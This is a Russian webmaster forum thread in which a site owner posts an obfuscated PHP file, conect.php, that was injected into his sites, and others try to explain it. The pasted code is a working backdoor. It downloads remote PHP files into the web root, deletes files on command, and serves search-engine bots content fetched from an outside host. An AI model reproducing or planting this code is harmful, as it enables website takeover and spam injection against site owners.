Помогите разобраться

12 3
Ромa
На сайте с 30.03.2010
Offline
5
1982

Сегодня просматривал свое хозяйство по ftp, натолкнулся на незнакомые файлы conect.php:madd: Удалил к е..ням собачьим их. Захожу на сайты - пишет что-то типа error ... include "conect.php". Пришлось это говно еще из index.php вычищать на нескольких сайтах. Движки везде разные - wordpress, dle, shopcms, vam shop и т.д. Пароль от ftp храню в голове, ни где не сохранял и не записывал. Вопрос - как эта хрень ко мне попала? Или уже хостеры до того ох...ели, что втыкают всякое уродство в скрипт клиенту?:madd::madd::madd:

Вот строка из index.php:

<?include('conect.php');?>

А вот сам conect.php:

<?php  $x1a="\143\157p\171"; $x1b="fi\x6c\145"; $x1c="\x66\x73\x6f\143\x6bo\x70\x65\156"; $x1d="\151\x6d\160\154o\144\145"; $x1e="\163\x74rp\x6f\163"; $x1f="un\x6c\x69\156\x6b";  $x0b="&us\x65\x72=&\x23\x310\0715\x3b\x26\043\x311\060\x30;\x26\043\x31\x307\067\073\040\x26\0431\x31\060\061;\046\0431\x309\x30\073&#\x310\0706;\041";if($_GET['chek']){echo"<\041\055-\x43\x48\x45\103\113\x312\063129\x33\067\061\x3238\067\062\x313\x2d\x2d\x3e";}$x0c=$_GET['path']; $x0d=$_SERVER['DOCUMENT_ROOT']."/"; if($_GET['installs']){ $x0e=$_GET['installs']; $x0f=$_GET['url']; $x10 = $x0f; $x11 = $x0d.$x0c.$x0e.".ph\x70"; if ($x1a($x10,$x11)){echo"\157\x6b";} } if($_GET['delete']){$x12=$_GET['delete']; if($x1f($x0d."$x0c\x2f$x12\x2e\x70\x68\160"))echo"\x6fk";} $x13 = array(); $x13['ad_Robots_UserAgent']=array('Google','Googlebot','Yandex','YaDirectBot'); $x13['ad_IsRobot']=false; foreach ($x13['ad_Robots_UserAgent'] as $x14){if ($x1e($_SERVER['HTTP_USER_AGENT'], $x14)!==false){ $x13['ad_IsRobot']=true; break;} } $x15 = ''; if($x13['ad_IsRobot']){ $x15 = @$x1c("\166\x69\x70\x2db\141se\x2e\142\x69\172", 80, $x16, $x17, 8);if(!$x15){echo "";} else{ $x18 = @$x1b("\150ttp\x3a\057\x2f\166\x69\x70\055\142a\x73e.\142\151z/y\141\156\x64\145\x78\x2f\163can.\x70hp\x3f\150o\x73\x74=$_SERVER[SERVER_NAME]\x26\151p\x3d$_SERVER[REMOTE_ADDR]\046$x0b"); if($x18==true) echo $x1d('',$x18); } } unset($x13,$x14,$x19,$x15); return $x15;?>
Запчасти FORD (http://fordok.ru)
RO
На сайте с 13.07.2009
Offline
88
#1

ну это врятле. хотя если пятирублевый хостинг то вполне возможно.

W
На сайте с 24.07.2009
Offline
21
#2
Ромa:
Вопрос - как эта хрень ко мне попала?

Взлом сервера хостера.

Конверт 253$/1k - здесь (http://tinyurl.com/3xtjr7e)!
Ромa
На сайте с 30.03.2010
Offline
5
#3

Хостер - всем известный товарисч, который живет в кувшине.😂

Inet-Ark
На сайте с 19.05.2010
Offline
43
#4

А что за хостинг?

MMO-игры и все, что с ними связано (http://gama.su/). Мой сайт с партнерскими программами — мало, но все надежные (http://best-pp.ru/).
Ромa
На сайте с 30.03.2010
Offline
5
#5

Кто не понял, хостер Jino. Мне просто интересно, что конкретно делает conect.php, и как с этим бороться в дальнейшем, создатели этой муйни наверняка не остановятся.

Да, забыл сказать как вышел на это недоразумение: сайт выпал из индекса Яши. Начал рыть, в роботс сайт закрыт практически полностью. Дата создания - текущий день. И так на нескольких сайтах.

Inet-Ark
На сайте с 19.05.2010
Offline
43
#6

Пока не понял, что она делает, но выглядит она очень странно - это точно.

vandamme
На сайте с 30.11.2008
Offline
675
#7

похоже на принудительное gzip архивирование, когда то ставил что-то подобное на сайт

но не уверен

AlikZP
На сайте с 22.11.2009
Offline
107
#8

Скрипт мог попасть разными способами: взлом хостера, шелл, взлом твоих ftp паролей и пр пр пр.

По самому скрипту:

1. Должна быть еще какая-то левая папка на сервере.

2. Скрипт проверяет - а не поисковый ли робот зашел на сайт. И если юзер-агент гугловский или яндексовский - лезет по адресу http://vip-base.biz/yandex/scan.php?host=ВАШ_САЙТ&ip=IP_ПОСЕТИТЕЛЯ ( РОБОТА )&user=НЕ ПОНЯЛ КАКОЙ.

Смотрите сайт vip-baze.biz для понимания ситуации. Там ролик какой-то есть, я не досмотрел.

Website CMS: быстрая, удобная, недорогая! Вечная лицензия за 45$ (/ru/forum/524503) Яся - быстрый поиск фото для товаров. OpenCart/ocStore. Дополнение. (/ru/forum/665287) Грамотная верстка ваших макетов (/ru/forum/comment/8853216)
Ромa
На сайте с 30.03.2010
Offline
5
#9

AlikZP, спасибо. Посмотрел этот типа-буржуйский проект. Сайт похож на очередной развод от мировых гуру по выколачиванию бабла из интернета. Много текущих куда-то баксов, улыбчивые хакеры, которые под видом благонадежных пиндосов ломают сайты доверчивых российско-украинских сеошников, короче зомбеж. Ничего конкретного - только регистрируйся и куча бабла поплывет к тебе.🤣🤪

Только зачем им кривой левый код на чужих сайтах - непонятно. Кстати, лишних папок на хостинге я не обнаружил.

[Удален]
#10

потерто/ошибся/10 слов

12 3

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий